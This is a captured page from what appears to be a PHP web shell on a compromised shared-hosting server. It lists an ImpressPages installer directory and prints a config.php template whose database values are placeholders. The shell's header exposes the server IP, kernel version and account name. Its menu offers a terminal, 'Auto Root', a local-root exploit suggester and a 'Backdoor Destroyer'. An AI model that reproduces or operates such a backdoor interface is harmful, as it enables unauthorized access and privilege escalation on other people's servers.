Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
impresspage /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php53
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php56
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php71
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php81
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php82
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
PasswordHash.php
6.74
KB
-rw-r--r--
2021-12-23 11:54
clone.php
5.88
KB
-rw-r--r--
2024-05-02 11:19
config.php
820
B
-rw-r--r--
2021-12-23 11:54
edit.php
4.37
KB
-rw-r--r--
2024-05-02 11:19
edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
fileindex.php
107
B
-rw-r--r--
2021-12-23 11:54
import.php
4.5
KB
-rw-r--r--
2024-05-02 11:19
info.xml
4.18
KB
-rw-r--r--
2024-05-02 10:25
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
4.89
KB
-rw-r--r--
2024-05-02 11:19
install.xml
1.25
KB
-rw-r--r--
2021-12-23 11:54
md5
6.56
KB
-rw-r--r--
2024-05-02 11:19
notes.txt
455
B
-rw-r--r--
2021-12-23 11:54
upgrade.php
3.52
KB
-rw-r--r--
2024-05-02 11:19
upgrade.xml
1.17
KB
-rw-r--r--
2021-12-23 11:54
Save
Rename
<?php /** * @package ImpressPages */ return [ 'sessionName' => 'ses[[SESSION_NAME]]', // prevents session conflict when two sites runs on the same server 'developmentEnvironment' => 1, // displays error and debug information. Change to 0 before deployment to production server 'showErrors' => 1, // 0 if you don't wish to display errors on the page 'debugMode' => 0, // Debug mode loads raw unminified JavaScript files, alerts AJAX errors. 'timezone' => 'America/New_York', // PHP 5 requires timezone to be set. 'db' => array ( 'hostname' => '[[softdbhost]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'tablePrefix' => '[[dbprefix]]', 'database' => '[[softdb]]', 'charset' => 'utf8', ), // Database configuration ];